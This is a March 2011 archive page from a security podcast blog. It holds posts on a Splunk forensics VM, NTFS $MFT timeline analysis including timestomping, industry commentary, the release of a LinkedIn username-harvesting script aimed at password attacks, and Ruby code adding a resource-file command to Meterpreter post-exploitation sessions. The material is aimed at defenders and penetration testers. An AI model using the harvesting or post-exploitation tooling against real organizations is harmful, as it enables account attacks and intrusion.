Courses:

Offensive Countermeasures: The Art Of Active Defense: SANSFIRE June 15-16, Blackhat USA July 27-28 & 29-30


Defensive Countermeasures: Foundations for Becoming A Devious Defender: Blackhat USA July 27-28 & 29-30


Conferences:

Check out the entire PaulDotCom crew at BsidesRI June 14-15th!



Subscribe:

Blog:
Videos:
Podcast:


PaulDotCom Español


Hack Naked TV


Hack Naked At Night


Stogie Geeks


Sponsored By:


www.coresecurity.com


www.tenablesecurity.com


www.sans.org



Follow Us On:


twitter.com/pauldotcom

PaulDotCom YouTube Channel


March 2011 Archives

Shenanigans Tonight on PaulDotCom Episode 237

By
Mike Perez
on March 31, 2011 12:08 AM |

Our guests tonight took particular exception to our (OK, we're throwing Larry under the bus here), Larry calling Shenanigans until he saw code to accompany the Android app that brute forces HIDs, so Michael Gough and Ian Robertson come onto the show to explain their RFID research.

NOTE: The video will play the most recent show up until we are live!

Also joining us will be Deral Heiland to update us on his recent ShmooCon presentation "From Printer to PWND".

shenanigans.jpg
That's right folks.

Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented. Please visit our Episode 237 Show Notes Page on the Wiki for more info on the podcast.

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

Cooking with Splunk

By
John Strand
on March 30, 2011 5:55 AM |
And now a guest post from Justin Hall!! Members of my incident investigation team are constantly on the move, traveling from customer to customer, gathering data, performing analysis, and writing reports. One of the tools we find ourselves commonly reaching for is a log analysis platform. Many of us are purists - “give me grep and coffee” types - while others enjoy a more organized “browsing” approach. We’ve found one solution that meets both of these needs - Splunk. (Note, I am not a paid spokesmodel for Splunk, we do not resell their product or make any money from them. We’re just big fans!) I wanted to distribute a custom Splunk-based log analysis platform for our crew to use. I had a few key requirements in building this platform: - It had to be portable. I wanted to build it and distribute it to our crew in a format that would be ready to use immediately, on any system in our fleet. - It had to be powerful. I wanted it to meet as many of our log analysis needs as possible, in one package. - It had to be secure. We need to make sure our customer’s data is protected while we’re investigating. - It had to be free (as in beer). Our budget didn’t have room for crazy expensive tools. So I went with a virtual machine that could be distributed and re-used easily. The recipe I ended up with included Oracle’s VirtualBox, a free virtual computing platform; Ubuntu Linux Server, my personal favorite flavor of Linux; and Splunk 4.2 for Linux.  Note, this article is not a “How to use Splunk” guide. If you are unfamiliar with Splunk, their documentation’s pretty good. I’ve found that just playing around with the tool is also a great learning experience! Here’s how I built the platform. 1. Install VirtualBox, if it’s not already installed. As of this writing, v4.0.4 is the stable release. 2. Configure host-only networking to use a private subnet between your PC and the virtual machines. We use host-only networking to transfer data between the VM and the host OS so that it cannot be intercepted outside of our machine. This feature is usually enabled by default - but you should verify the subnet you’re using, and the IP you have set on your host OS’s interface.
HostOSInterface.png
3. Create a new VM. I use two NIC’s on the VM - the first interface is bridged to the LAN, and only up when I am patching. The second interface is the host-only network, which will receive an address on that network from VirtualBox’s built-in DHCP server. Make sure to give your VM sufficient RAM - I use at least 1GB - and enough disk space for the largest log set you can imagine storing on the VM’s filesystem. I usually max it out at around 30GB.
30GB.png
4. Install Linux. During the installation, we enabled full-disk encryption - not just because you might store log data on the VM’s filesystem, but because Splunk will index the logs and those indexes also may contain sensitive data. I use a dummy key initially; when I distribute the VM, our investigators add their own decryption key and remove the dummy key, so that it’s unique to each user’s VM.
UsersVM.png
5. You’ll also want to install the SSH server, so that you can securely transfer logs to the VM over a network connection.
NetworkConnection.png
6. I have two users on the machine - a standard user for normal operation and administration, and for manual log analysis; and a Splunk service user. I call my first one ninja, but you can use whatever less awesome name you like. Then I add a Splunk user (called splunk), and give that user a home directory of /opt/splunk. 7. Once your OS is installed, configure the SSH server to disable root login, and if you don’t want to use passwords every time you copy a file to the VM, add your public SSH key to ~/.ssh/authorized_keys (although you may not want to do so before distributing!).
BeforeDist.png
8. What’s the first thing you do after installing an OS? Patch! I bring up my bridged adapter and sudo apt-get update; sudo apt-get upgrade once a week or so. Remember to shut eth0 down afterwards. 9. Install Splunk on the VM. I’ve found the easiest method is to download the .deb package from Splunk, SCP it to the VM and run dpkg -i. It will install by default in the splunk user’s home directory, /opt/splunk. 10. Add your ninja and splunk users to a “logs” group (I call mine “logs”). We will restrict the logs directory so only users in that group can write to it. 11. You can get your logs to the system in many ways - copy from mounted removable media, download from a webserver, direct syslog, etc. Personally I like to SCP them to a logs directory on the filesystem, like /logs. Give the logs group +rw permissions to this directory - this is important, because Splunk will need to read the logs from this directory, and we’re going to run Splunk as the splunk user. I use the ninja user to SCP logs to this directory, from my host OS, using the host-only network. You can remove other read/write permissions to the directory. 12. Fire up Splunk! Su to your Splunk user, make sure that user has +rw on the /opt/splunk/ directory tree, and run /opt/splunk/bin/splunk start. You’ll have to accept a EULA. 13. Open your browser on your host OS and hit the web interface (http://vm-host-only-address:8000) on the host-only network. Log in with the default credentials, which are listed at the login page.
LoginPage.png
14. Switch to Free license: go to Manage -> Licenses -> Change license group. The Free license has some features disabled (but probably nothing you’ll miss with this setup) and can only index 1GB of logs per day. If you go over once, Splunk will nag you; if you go over 3 times in a rolling 30-day period, Splunk disables your search capability until you upgrade to a paid license. So be careful!
BeCareful.png
15. Configure Splunk to monitor the /logs directory. This will make Splunk read log data as soon as it’s written to /logs. In Splunk, go to Manager -> Data Inputs and open Files and Directories. Add a new file input and point  it to the /logs directory on the filesystem. You can leave all the other options at the defaults. You also may want to disable the other inputs listed under Files and Directories - the defaults are just Splunk logfiles, but you might not want that data inadvertently showing up alongside your customer’s logs.
CustomersLogs.png
16. Test your setup – SCP a logfile to /logs and make sure it gets eaten by Splunk and is searchable. Watch Splunk’s main search page until events start showing up - the Events Indexed counter will increase. Run a search to verify the data is being processed properly. 17. You might want Splunk to start when you boot your VM. If so, enable Splunk boot-start with the splunk user: as root, run /opt/splunk/bin/splunk enable boot-start –user splunk 18. That’s it! You’re ready to analyze. Note, when you are done with an investigation, switch to the splunk user, and run /opt/splunk/bin/splunk clean eventdata to remove all of the indexed data and prepare a blank slate for future investigations. We’ve found this platform extremely convenient for log analysis work. When we want to do full-scale analysis, we have Splunk; when we want to quickly grep | cut | sort | uniq, we have the command line. I handed the VM files - the VBOX config file, and the .VDI virtual disk it uses - to my investigation team, had them change the appropriate passwords, and they were ready to go. We hope you find this recipe useful as well. Happy hunting! Quick shameless plug: I am mentoring a session of SANS’ SEC504 - Hacker Techniques, Exploits & Incident Handling in Cincinnati, Ohio, starting May 11. You can find more information about the class, dates & times, and sign up here. Hope to see you there!

Comodo and Feeding Trolls

By
John Strand
on March 29, 2011 11:54 AM |
Short post today. I am currently in the middle of teaching SANS 504 in Orlando and I am quite stoked to learn that @CoryKennedy will be joining the class today. If you have not already, you should check out his blog here. However, I did want to mention the Comodo attack briefly. It turns out the attacker is modeling his hacking career after Charlie Sheen. Please see below:
PastedGraphic-1.tiff
Now, I know I am breaking a key rule of the Internet because I am feeding an obvious troll. But, dang... If that aint funny.
2troll.jpg
However, this is another attack that highlights just how bad things can get if an attacker gets a single SSL provider. In this attack it looks as though he compromised GlobalTrust.it and InstantSSL.it who were partners of Comodo. From there he was able to forge certificates for Skype, Yahoo, Google and Mozilla. You should go back and read that last line again... I'll wait. What does this mean to the industry as a whole? Well, it is once again showing there can be weaknesses in every security layer we implement. Once again, we need to look at our security architecture and look for any components where failure can lead to total failure of the architecture. As for trolls, don’t feed them...Unless it’s fun.

PaulDotCom Security Weekly Episode 236 - March 24, 2011 - "The Marathon"

By
Paul Asadoorian
on March 28, 2011 6:02 AM |

Fully packed show! Chris Nickerson and Eric Smith come on to talk about PTES, the new standard to executing penetration tests. Kevin Fiscus does an interview about risk management, helping customers, and more! Bugbear does a technical segment that will make you think twice about timestomping (NTFS MFT FTW), and the crew talks stories, including RSA, Comodo, and more!

PTES - Penetration Testing Execution Standard

NTFS MFT Timelines and Malware Analysis

Security News - "Drunken Style" - PaulDotCom Episode 236

Episode 236 Show Notes

Episode 236 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce

Audio Feeds:

Tim Mugherini presents NTFS MFT Timelines and Malware Analysis

By
John Strand
on March 28, 2011 5:57 AM |

We get a special guest technical blog post straight from Tim Mugherini.

NTFS: “New Technologies File System”

Default file system of all modern versions of Windows. Version 3.1 is the current version on Windows XP and above. The Master File Table ($MFT) is the heart of the NTFS file system and contains the metadata about all the files and directories on the file system. Each file and directory has at least one entry in the $MFT.

By default, Each MFT entry is 1024 bytes in size (defined in boot sector) with the first 42 bytes containing 12 defined fields and the remaining unstructured space being used by attributes. It is these attributes that can be useful during analysis but only if we understand the effects of the operating system, software, and user behavior on these values.

There are some limitations. The MFT will expand as needed and NTFS does NOT delete MFT entries after they have been created. But an entry will be re-allocated for use if the file has been deleted. Upon file deletion, the entry’s “in-use” flag is set to 0x00 and the entry will become available. Entries are reused in sequential order and once re-allocated, the attribute data is overwritten.

Loving the Hex: Overview of NTFS Master File Table Attributes


MFTBreakdownChart.png

The $STANDARD_INFORMATION ($SI) attribute has a type identifier of 16. There are four 64-bit (MACE) timestamps in this attribute that represent the number of one-hundred nanoseconds since January 1, 1601 UTC. Many of the values stored in the $SI attribute are displayed in explorer.exe when viewing the properties of a file or folder.


FileProperties.png

The $FILE_NAME ($FN) attribute has a type identifier of 48 and contains the file name (encoded in UTF-16 Unicode), parent directory reference, and additional MACE timestamps. Rob T. Lee has done a fair amount of work on cataloging the differences in behavioral changes of both the $SI and $FN time attributes. So if the behavior of $MFT time attributes are known, we can use them to assist in identifying malicious files.

The Sleuth Kit: FTW

The Sleuth Kit (TSK) is a collection of forensic command line tools for *nix and windows, and can analyze most common file systems.
Let’s search a dd (raw) image for a suspected malicious file called malicious.dll with the TSK tool “fls”.

# fls -f ntfs -r Image001.dd | grep malicious.dll
++ r/r 1618-128-1:	malicious.dll

This returns the $MFT record number which is 1618. Using “icat” we can now carve the $MFT entry out.



# icat -f ntfs Image001.dd 0 | dd bs=1024 skip=1618 count=1 | xxd

I have shortened the output to display just the entry header and marked up some attributes of interest.

MFTHeaderBreakdown_highlighted.png


Now we can view specific attributes for this entry by specifying the type. For example, to view $SI (type=16) for entry 1618 (offset 56 as defined by bytes 20-21 above).

# icat -f ntfs Image001.dd 1618-16 | xxd


Type16.png

The first thirty two bytes represent the creation, modified, entry, and accessed times (8 bytes each). Note three of these attributes appear to be the same (February 11, 2010 7:30 AM). The entry date is different, however (March 2, 2011 7:15 AM). This is the date the #MFT entry was created and is usually the same as the creation (born) date (an exception would be in a soft delete of a file). Bytes 32-35 represent the attribute flags outlined earlier (i.e. read only, archived, etc...).
Similarly, to view $FN (type=48) for entry 1618.



# icat -f ntfs Image001.dd 1618-48 | xxd


1618.png

Bytes 0-7 of the $FN time attribute, are the parent reference (or in this case the system32 folder). The next 32 bytes are the first four $FN Time values which match the $SI Entry date. The last 28 bytes in the above example represent the file name.

Stop: A Quick Side Note on File Deletion

If a file is recycled then the file name will change to $.ext, and its location will be in .\Recycle.Bin\\ folder. The $MFT record will still be marked active until the recycle bin is emptied and the $SI Entry Date will represent the date the file was moved to the recycle bin even after removed from the Recycle Bin.
If a hard delete of the file occurred. Then the $MFT record is immediately marked inactive and the file name and all time attributes remain unchanged (until over written by a new entry).

Practical Use: Exporting and Parsing the $MFT

While using TSK is useful to view a $MFT entry for a specific file, it might be useful to parse all entries into a friendlier format for further analysis. If you have identified a malicious file, doing so could help identify all other files and folders associated with the time of compromise.
First we must carve out the entire $MFT from a volume or image with “icat”.



sudo icat Image001.dd 0 > MFTOut.csv

Once, we have the $MFT we can use David Kovar’s analyzeMFT.py to parse every record into csv format.



analyzeMFT.py -f MFT -o MFTOut.csv –a

The following is an example of rogue AV (ISe6d_2229.exe) I discovered on a user’s Windows 7 laptop. By parsing the $MFT I was able to discover the other file locations associated with the time of infection. The following output was sorted by the $FN Entry Time (note: times are in UTC by default).

RogueAVMFTOut.png


In this case I used this information to identify the prefetch file associated with the infection and used prefetch parser to parse the contents and obtain the location of the payload for dynamic analysis.

Prefetch.png

Anti-Forensics: Manipulating of the $MFT Times

It is possible to manipulate the $SI timestamps. Vinnie Liu demonstrated this with the Metasploit Timestomp project in 2005. The following, is an example of doing the same with Windows PowerShell.

PowershellSIManip.png

Let’s use the TSK “istat” tool to obtain the metadata of our malicious file in a visually friendlier way.

# istat –f ntfs ntfs1.dd 1618
Istat_out.png

If the $SI Entry Modified date mirrors the creation date, then the above output might indicate possible timestamp tampering (an exception would be file deletion). Additionally, the $FN Attributes initially mirror the $SI Creation date. They can change but it is more difficult to manipulate $FN Attributes but not impossible.
Changing the system time prior to file creation would certainly get you there but there would still be indicators of the initial compromise. Thus changing the time attributes post file creation would be ideal. Changing the system time, altering the $SI attributes, and then leveraging some of the behavioral effects on the $FN Time attributes (i.e. moving and renaming the files) would change all the time attributes.
This could still be detectable, however. New Features in analyzeMFT.py (v 1.5 and above) not only look for differences between $SI and $FN Time attributes but also look for usec abnormalities. 



•	-a (anomaly detection) adds two columns:

•	std-fn-shift:  Y = $FN create time is after the $SI create time

•	Usec-zero:    Y = $SI create time has usec = 0

The following examples demonstrate both abnormalities.

AnalyzeMFT_usec.png

Coming to a Lab Near You: Super Timelines

$MFT $FN Attributes + Super Timelines = WIN

Utilities such as Log2Timeline and the Sleuth Kit Mactime allows for the creation of a Super Timeline by leveraging the bodyfile format. Multiple timeline sources (i.e. event logs, registry, prefetch etc...) can be combined for complete forensic picture of an incident or compromise.

To date this has not been possible with both the $SI and $FN attributes from the $MFT however. Mark McKinnon was kind enough to let me check out his MFT_Parser utility which does support this functionality. The full file path for each $MFT entry is listed as is both the $SI and $FN time attributes. This is very useful for detecting stomping while looking at super timeline. Dave Hull has a great post on the subject here.

Mark as released this utility for Windows as beta for PDC listeners (*nix and mac support is also on its way). The Windows version can be found here.

The syntax for the cli is as follows:



mft_parser_cl.exe <$MFT File>

For Example: mft_parser_cl.exe $MFT pdc001 MFTOut C would output everything on the volume in the following formats:

|C:/Windows/System32/
malicious.dll|1618|-/-rwxrwxrwx|0|0|0|1299068121|1265891400|1265891400|1265891400
|C:FN/Windows/System32/malicious.dll|1618|-/-rwxrwxrwx|0|0|0|1299068105|1299068105|1299068105|1299068105

IR and Malware Analysis WIN!

Summary

This is one forensic technique (Timeline Analysis) that focuses on one object ($MFT) in one layer (Metadata) of one type of file system (NTFS) during one type of malware analysis (Static) that is typically done during one phrase (Detection/Analysis) of incident response. It is something you can add to your Incident Response and Malware Analysis toolkit.

Table Stakes and EMO Security

By
John Strand
on March 24, 2011 6:28 AM |

I've been thinking a lot about this topic lately, so Rich's article is timely. Rich says that we are finally at the table, security is a legit "thing" now, and we should stop whining about FUD, products, sales people, and a host of other things.

First, we're not complaining, well some of us may be, but most of us are trying to keep this business away from FUD and stop people from using half-baked products. This is important to business, any business, not just security, and it’s important for all of us to understand business as it related to security. I hear ya Rich, not all of us do, and we could benefit from a "Business 101 for Security Professionals Course." I have a degree in business, and it was nothing more than experience that taught me what I know, albeit I am still learning. The business landscape is constantly changing, and we have to roll with the punches as technology, and the security of the technology, constantly changes. Okay, enough rambling, let me address Rich's points, some of which are really spot on.

1) Hate the endless compliance cycle? For most of you it's the only reason executives listen to you at all. - Really? If the only reason stakeholders listen to me is because of PCI, I am doing it WRONG. Compliance is one phase of the game, don't forget about raw security and that thing called risk management. If you can't work with your management on all three fronts, you are playing a losing game (hopefully its not global thermonuclear war).


wargames.jpg

By the way, if you see this during a pentest, it can be a bad sign..

Or a sign of the best Pentest Ever!!

2) Hate the "industry"? Name me one other area of society involving big money that doesn't become dominated by some sort of industry. - I think we're dominated by business, and if you don't understand the business, you shouldn't be complaining. That’s not to say we all can't work to make this industry have integrity.

3) Despondent over lack of innovation? Then stop buying the same crap you buy every year and invest in the products struggling to innovate - I could not agree more! We have crappy products because people buy them.

4) Tired of users who just don't get it? How about you stop pretending human behavior can change and that just because you see something a certain way you're any better than everyone else. BINGO! Don't give up on user education, but continue to use innovative technologies that protect the user and let them do their jobs.

5) Pissed at careless developers? Go write a secure piece of software on time, budget, and specifications, and come talk to me again. - Yes, writing secure software is hard. However, this is another area where you can use education, coupled with technology, to make resilient software. There are many efforts in this area, Rugged, Dan Kaminskies project.

6) Shocked that the bad guys are targeting you personally? Why the f* wouldn't they try to remove or distract the guards? Do you want to be friends? - So true, I used to hear "No one would want to hack us." Get over it, people want to hack you. They are many. They have all different motives. They come in all shapes, flavors, and sizes. Defense is hard, be creative.

7) Angry at vendors that lie about capabilities? Then stop forcing them to have dozens of widgets and performance capabilities you won't ever use or send back for a refund. - Whoa, how is it my fault that vendors lie about capabilities? It’s true, technology gets complicated because everyone wants something custom for their needs.

Dear vendors, provide your customers a nice API, tell them to hire some talented people, and stop requesting one off features. There's a start. Example, why do I need 8,000 features in my web browser or document publishing product? It’s a tough market, and features rule, but my bet is that you could sell module and trimmed down versions of software. The problem is human nature tells us that we want the "advanced" version of everything, not the basic, because heaven forbid we don't have a feature, like Mr. Clippy.

Finally, we think this is fun. Sure, we discussed a story where one individual said he was ready to quit on the last show, and that is sad. But we should also all understand that we are at a point where IT is learning the limitations of their security services and products. Many of us in the security industry have known this for quite some time. But it is nice that other members of management, and IT are starting to see it as well.

The point is this is a dynamic and fun field. Also, many of us know what and where security's limitations exist. This is a good thing. Now, we just need to do something about them.

In short, we agree with Rich. We need to stop complaining and start spending more time fixing problems.

345px-Emo_hitler.jpg
Emo is lame
Hitler is lame
Neither belong in Information Security

-Paul Asadoorian and John Strand

Originally discussed during episode 234

John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration testers This April in Reston, VA April 15 - 23.

PaulDotCom Episode 236 - Live tonight with a lineup guests!

By
Mike Perez
on March 24, 2011 4:43 AM |

Eric Smith, Chris Nickerson, Kevin Fiscus & Bugbear all come on the show tonight! Alphabet soup includes PTES, NTFS MFT Timelines, and NWN Stars. We've got a about two episodes worth of material in one night - come and join the show live!

You can view live at 7:30PM EDT right here:

NOTE: The video will play the most recent show up until we are live!

Bugbears_toolkit.jpg
BugBear asks: What's in your Incident Response Toolkit?

Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented. Please visit our Episode 236 Show Notes Page on the Wiki for more info on the podcast.

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.

- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and Mike Perez.

PaulDotCom - Security Weekly - Episode 235 part 2 - March 17th 2011

By
Darren Wigley
on March 22, 2011 5:23 PM |

Georgia "Troublemaker" Weidman joins us to discuss her experiences at the Mid-Atlantic CCDC competition as both a blue team member, and an incarcerated red team member. Then she discusses how her quest for a method of preventing embarrassing drunken texting led to her research in to the bot net control using sms. Can you hear me now? I thought so...

Episode 235 Show Notes

Episode 235 part 2 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce

Audio Feeds:

Name That Employee with Gloodin0.1

By
John Strand
on March 22, 2011 12:25 PM |
gloodin0.1Released!

Posted by Dennis Antunes
@antunesdennis

gloodin quite simply uses unique search techniques to maximize the number of potential usernames that can be harvested from linkedin using google's cache and a given target organization name.
As automated crawling is contrary to google's TOS, this tool is provided for research purposes only. Using this could really tick off google and get you shunned. Please don't cry to me if this happens.

REQUIRES: python 2.x and the lxml package

USAGE: Simple: 
./gloodin.py <target organization>
Results will be written to a number of files, most notably first_dot_last_<target_org> which presents the results in the only currently built-in format: firstname.lastname.
More formats to come: (first initial dot last; last dot first, etc). I hope to have command line switches to easily select the desired format with the option of appending email addresses as well shortly.

WHAT IT REALLY IS: gloodin is a python script that makes a large number of google queries along with the modifier "site:linkedin.com" to harvest thousands of potential employee names, going far beyond what a typical manual search would allow.
It achieves this by repeatedly searching for some very common first names, last names and titles, later stripping these out to grab all the rest. These names/terms are easily configurable by editing the included searchterms.txt, which is read in at run time.

WHY: To demonstrate how easy it is to harvest potential user names via social media, to underscore how important strong passwords are and to stress the overall need for two-factor authentication.

See http://securityjuggernaut.blogspot.com/2011/02/brute-forcing-passwords-part-2-with-and.html for more reasons to hate weak passwords.

TIPS: Some ways to improve the default searchterms.txt might be: add in the 10,20,30... most common Russian, Spanish, Portuguese, <insert language of choice> names; research the target organization and add in some of their common position names, etc.
Potential is limitless really. Just keep in mind you will eventually hit a limit as far as the query string is concerned. I've heard a 4K limit, but no one really knows for sure as google may impose there own as well. If you find out, please let me know... Again, this tool is for research purposes only. You risk getting shunned by google for using it. Do this inside of a corporate environment and you may also get punched in the face.

DISCLAIMER: The special sauce here is the approach to searching. I am not a coder by trade so admittedly, this code could be a whole lot better. Any suggestions for improvement would be greatly welcomed.

INSPIRATION: Heavily inspired by Reconnoiter: http://sourceforge.net/projects/reconnoiter/ Thank you Jason Wood!

LEFT TO DO: LOTS!!!
Support unicode
Break sections into functions:
  • Fetcher
  • Parser
  • Uniquer
  • Mangler
  • Spammer (email address appender) 
Command line switches for user name output format/separator --lf --fl --sep --all

All suggestions welcome!!!

Posted by Dennis Antunes
@antunesdennis
Mentoring the SANS Sec 542 in Foxboro, MA beginning 4/13/2011.
Before you register email me at stratmofo at gmail dot com for a special discount code!

On RSA and the engineering of security

By
John Strand
on March 21, 2011 3:15 PM |

Wow…

Another week and another major organization goes down. I am sure you have read the story about RSA being compromised.

If not, the gist of the story is here.

The question now becomes: What does this mean to my organization? There are a couple points that we have been hitting for the past few weeks. Number one is that traditional detection and reaction technologies are failing. Does this mean we need to throw them away and start over? No. What it means is there are limitations to these devices and technologies. There are a number of people who say that the penetration testing community is crap because all we do is break into systems and collect paychecks. Unfortunately, this is true for some of the organizations that are doing testing, but it is not indicative of our industry as a whole.

Rather, I propose this for looking at the state of penetration testing today. We are the structural engineers of the IT industry. Take a look at the building you are in right now. It does not matter if the building has Greek columns or second hand Steinways. It is a work of brilliance. The reason this brilliance is possible is because of the generations of testers that found the exact failure points of various materials such as wood, masonry and various forms of steel. In order to push the limits and build bigger and more resilient structures we need to know the limitations of the designs and the materials they use.

Today in IT there are a number of different forces that are trying to convince your organization that if you buy (DLP/AV/IPD/Firewall X) then your systems will be secure. This is total crap.


24-299coors-light-posters1.jpg

Paul made me put this in... I like Coors Light... A lot.

IT and especially Information Security is a dynamic endeavor. We need to make sure that different components interact with each other in such a way that a single compromise of one component does not lead to a total compromise of an organization. As penetration testers (if we are doing it correctly) we need to find the component, and more importantly the structural failures of organizations. For example, I think it is safe to assume that an attacker will compromise a user via social engineering. That is going to be a given for quite some time. However, is it a systematic problem for your entire organization? Can I successfully SE anyone in your company including the Systems Administrators? If so, this is a major component failing. Further, if I can compromise one system via social engineering can I compromise the rest of your organization? Can I remain persistent for weeks… If not months? This failing is unacceptable.

In short, if we built buildings like we design IT and security operations, there is a good chance that we would all still be living in one-story mud huts.

So, going forward, what can we do? First, test beyond initial expatiation. Second, test and train the human factor. Finally, train the Systems Administrators in your organization. These are the people that build and maintain the structural components of your organization. They need to know the limitations and failure points of the things they build. For too long organizations have worked to keep Systems Administration and Security separate. This is a flawed approach.

It is time to start moving beyond this. We are outgunned. The attackers have tremendous resources at their disposal. We need the help of the users and the IT staff to fully prepare for the threats we are facing.

Once again, I know we are going to get flamed by people saying their users are dumb. That working with SAs is hopeless. Because of these two "facts" there is no reason to better educate for users and SAs.

This belief is wrong.

Just because something will fail does not mean it is worthless. It just means it has a failure point. Just like steel and wood. Put enough weight on it and it will break. The point is to design your architecture in such a way that one 2x4 or a truss failing does not lead to a catastrophic failure of an entire building. The same goes for IT.

John Strand

John Strand will be teaching SANS 660 Advanced Network Penetration Testing and Metasploit for Penetration testers This April in Reston, VA April 15 - 23.

PaulDotCom - Security Weekly - Episode 235 part 1 - March 17th 2011

By
Darren Wigley
on March 20, 2011 10:29 PM |

OSSTMM Creator Peter Herzog is interviewed to share his thoughts and work in the security field... and all the way from across the pond.

Episode 235 Show Notes

Episode 235 part 1 Direct Audio Download

All the Pauldotcom Security Weekly episodes on our Bliptv archives.

Hosts: Paul "PaulDotCom" Asadoorian,John Strand,Larry Pesce

Audio Feeds:

Meterpreter Resource Files

By
Carlos Perez
on March 17, 2011 10:25 PM |

Tonight while chatting via IRC with Egyp7 he mentioned that Meterpreter should have capability of using Resource files for cleanup in post exploitation and for automating tasks by users without the knowledge in Ruby and the Framework to write a Meterpreter Script or Post Module. He opened and ticket and assigned me the task. Here are the results

I first opened the file  lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb this file has all the command for the Meterpreter console so the first this was defining the Resource command:

 def commands

                c = {

                        "?"          => "Help menu",

                        "background" => "Backgrounds the current session",

                        "close"      => "Closes a channel",

                        "channel"    => "Displays information about active channels",

                        "exit"       => "Terminate the meterpreter session",

                        "help"       => "Help menu",

                        "interact"   => "Interacts with a channel",

                        "irb"        => "Drop into irb scripting mode",

                        "migrate"    => "Migrate the server to another process",

                        "use"        => "Load a one or more meterpreter extensions",

                        "quit"       => "Terminate the meterpreter session",

                        "resource"   => "Run the commands stored in a file",

                        "read"       => "Reads data from a channel",

                        "run"        => "Executes a meterpreter script or Post module",

                        "bgrun"      => "Executes a meterpreter script as a background thread",

                        "bgkill"     => "Kills a background meterpreter script",

                        "bglist"     => "Lists running background scripts",

                        "write"      => "Writes data to a channel",

                }




Once this was done I added 2 methods, the first one for tab completion of the command:



  1:  def cmd_resource_tabs(str, words)

  2:                 return [] if words.length > 1

  3: 

  4:                 tab_complete_filenames(str, words)

  5:         end

  6: 



Then the method that defined the command it self:



  1: def cmd_resource(*args)

  2:                 if args.empty?

  3:                         print(

  4:                                 "Usage: resource path1 path2" +

  5:                                   "Run the commands stored in the supplied files.\n")

  6:                         return false

  7:                 end

  8:                 args.each do |glob|

  9:                         files = ::Dir.glob(::File.expand_path(glob))

 10:                         if files.empty?

 11:                                 print_error("No such file #{glob}")

 12:                                 next

 13:                         end

 14:                         files.each do |filename|

 15:                                 print_status("Reading #{filename}")

 16:                                 if (not ::File.readable?(filename))

 17:                                         print_error("Could not read file #{filename}")

 18:                                         next

 19:                                 else

 20:                                         ::File.open(filename, "r").each_line do |line|

 21:                                                 next if line.strip.length < 1

 22:                                                 next if line[0,1] == "#"

 23:                                                 begin

 24:                                                         print_status("Running #{line}")

 25:                                                         client.console.run_single(line)

 26:                                                 rescue ::Exception => e

 27:                                                         print_error("Error Running Command #{line}: #{e.class} #{e}")

 28:                                                 end

 29: 

 30:                                         end

 31:                                 end

 32:                         end

 33:                 end

 34:         end

 35: 



One of the first things I did was from lines 1 to 7 is check if an argument is given if not display a help message and return false.  Next thing I do from lines 8 to 13 is check that each argument is actually a file. You can give it several files to process. Then from lines 14 to the end of the method you will see I check if the file is readable, open it and use the client.console.run_single() to run each command as if they where typed in the console. You will notice that on lines 21 and 22 I check for empty lines and commented lines, this will allow you to comment your resource files. 



To use the command simply use the command resource and the file containing the commands here you can see an example run:



meterpreter > resource /tmp/cmd.rc

[*] Reading /tmp/cmd.rc

[*] Running sysinfo

System Language : en_US

OS              : Windows 7 (Build 7600).

Computer        : INFIDEL01

Architecture    : x64 (Current Process is WOW64)

Meterpreter     : x86/win32

[*] Running getuid

Server username: Infidel01\Carlos




The contents of the file is as follows:



loki:trunk cperez$ cat /tmp/cmd.rc

sysinfo

getuid


        




    

    




    



    

        
Join Us Live Tonight For PaulDotCom Security Weekly!

        

    

        By 
Paul Asadoorian
 on March 17, 2011  9:33 AM

    
    | 
    
        
        
    



    

    


        

            
Paul, Larry and the gang will converge tonight to bring you their own special blend of "awesomesauce".  Special guests include Peter Herzog,  creator of the OSSTMM and Georgia Weidman talking smartphone botnets.



You can view the show live at 7:30PM EDT right here:






NOTE: The video will play the most recent show up until we are live!



Each episode comes complete with show notes, detailing the interviews, tech segments, and stories presented.  Please visit our Episode 235 Show Notes Page on the Wiki for more info on the podcast.



For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our  IRC channel, or tune into PaulDotCom Radio for an audio only version of the show.



- Paul Asadoorian, Larry Pesce, Carlos Perez, Darren Wigley, John Strand and  Mike Perez.

        




    

    




    



    

        
Look! Another Adobe 0-Day!!!

        

    

        By 
John Strand
 on March 16, 2011  8:24 AM

    
    | 
    
        
        
    



    

    


        

            
So, here we are with another Adobe 0-day vulnerability. No! Wait! Stop!  Don't go away from this page because you think it is a repeat from the past multitude of Adobe 0-days.  This one is for Reader and… for Flash.  See, that is something kind of new!



Anyway, why should you care?  First, this exploit has been used on a "very small number of organizations and limited in scope.” See! there is nothing to worry about…



john-wayne-gacy.jpg


Except for clowns.. 


We still need to fear clowns 
 


But wait… There’s more.  The advisory goes on to say it has been used to “install persistent malware on the victim's machine."  Okay, now is a good time to harken back to what we talked about yesterday.  The threat landscape is no longer changing folks, it has changed.  As we have been hammering that traditional detection and prevention technologies are easily bypassed on the show for the past few months.  Don't believe us?  Go and talk to any competent pen testing company.  Very rarely does AV and IDS/IPS get in the way.  Further, if we think about current penetration tests, they are very limited in scope.  We usually only have about a week or two, possibly a month for most engagements.  This means we are not spending a tremendous amount of time working on 0-days or taxing ourselves too hard to develop custom malware.  



However, that being said, if you are a sufficiently large organization with adversaries that could make millions off of a compromise, you better believe they are going to spend the cash to purchase or develop 0-day or custom malware as part of their strategy to compromise you. 



